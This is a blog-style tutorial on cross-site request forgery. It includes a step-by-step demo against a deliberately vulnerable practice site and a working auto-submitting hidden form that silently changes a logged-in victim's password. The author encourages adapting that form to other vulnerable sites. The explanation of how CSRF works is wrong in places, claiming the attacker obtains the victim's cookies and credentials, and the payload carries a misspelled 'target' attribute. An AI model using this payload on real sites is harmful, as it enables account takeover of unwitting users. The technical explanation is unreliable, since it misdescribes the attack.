Website Hack With CSRF Attacks
What is CSRF Attack :
Cross-Site Request Forgery (CSRF) is a web security vulnerability, you can say it’s a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user’s web browser to perform an unwanted action on a trusted site when the user is authenticated.
It’s allows an attacker to force the victim user to perform state changing requests like transferring funds, changing their email address, and so on. If the victim is an administrative account, CSRF can compromise the entire web application.
How it works:
CSRF attack tricks the victim into submitting malicious requests and it also inherits the identity and privileges of the victim user. When you visit any site and you logged in the site and you may visit different pages of the site but you may still logged in or when you quit from your browser and after some times you visit that site in your browser you will see you are still logged in so how does that site distinguish you from other user or how does that site knows that’s you??
Answer is the site knows the user’s session cookie, IP address, Windows domain credentials, and so forth. So when you hit that website with your browser, your browser will include that hit your session cookie, IP , some credentials and many more. So when an attacker got these credentials, attackers include those info in the browser and hit the website, then your associate website will have no way to distinguish the attacker from you.
CSRF attacks target functionality that causes a state change on the server, such as changing the victim’s email address or password, or purchasing something. Forcing the victim to retrieve data doesn’t benefit an attacker because the attacker doesn’t receive the response, the victim does. As such, CSRF attacks target state-changing requests.
A CSRF Hacking Demo:
First of all hackers gonna find out if your website is CSRF vulnerable of not, if then they will try to run a form on your browser with hidden value as we say before. So let’s see in practical manner.
Here i am using a CSRF vulnerable site ->https://hack-yourself-first.com/ you can also go through with me (only for educational purposes).
Before we start, go to that website and register an account and be a logged in user. Let’s start
- Step 1: Go to > My account > Change Password
- Step 2: Go to Inspect of your browser (Ctrl+Shift+I) and find the html of New Password and Confirm new password]
<input id="NewPassword" name="NewPassword" type="password" value="technotom"> <input id="ConfirmPassword" name="ConfirmPassword" type="password" value="technotom">
So these the form html code that matters there if we can remotely submit a form by the victim user by java-script then the password will be changed without knowing of the victim user.
- Step 3: It’s time for some code, open your IDE and write these html.
<html> <body onload="document.form.submit()"> <form action="https://hack-yourself-first.com/Account/ChangePassword" terget="hiddenFrame" method="post" name="form"> <input id="NewPassword" name="NewPassword" type="password" value="hack001"> <input id="ConfirmPassword" name="ConfirmPassword" type="password" value="hack001"> </form> <iframe name="hiddenFrame" style="display: none;"></iframe> </body> </html>
save it as “form.html” and open it to your browser… and the magic happens in background.
you can customize this for any other CSRF vulnerable site all you have to do is try to find out the html for the field you want to change and then in form action put the executable link and that’s that’s pretty much everything.
- Step 4: Go to Inspect of your browser (Ctrl+Shift+I) and find the html of New Password and Confirm new password
Now you will see the password value as "hack001", so what it means …I know you guess it.We changed the password as "hack001".So that was a practical.
More could do:
It’s sometimes possible to store the CSRF attack on the vulnerable site itself. Such vulnerabilities are called “stored CSRF flaws”. This can be accomplished by simply storing an IMG or IFRAME tag in a field that accepts HTML, or by a more complex cross-site scripting attack.
If the attacker can store a CSRF attack in the site, then CSRF attack is amplified. In particular, the likelihood is increased because the victim is more likely to view the page containing the attack than some random page on the Internet. The likelihood is also increased because the victim is sure to be authenticated to the site already so the attacker is.Yeah that’s pretty much everything i want to share.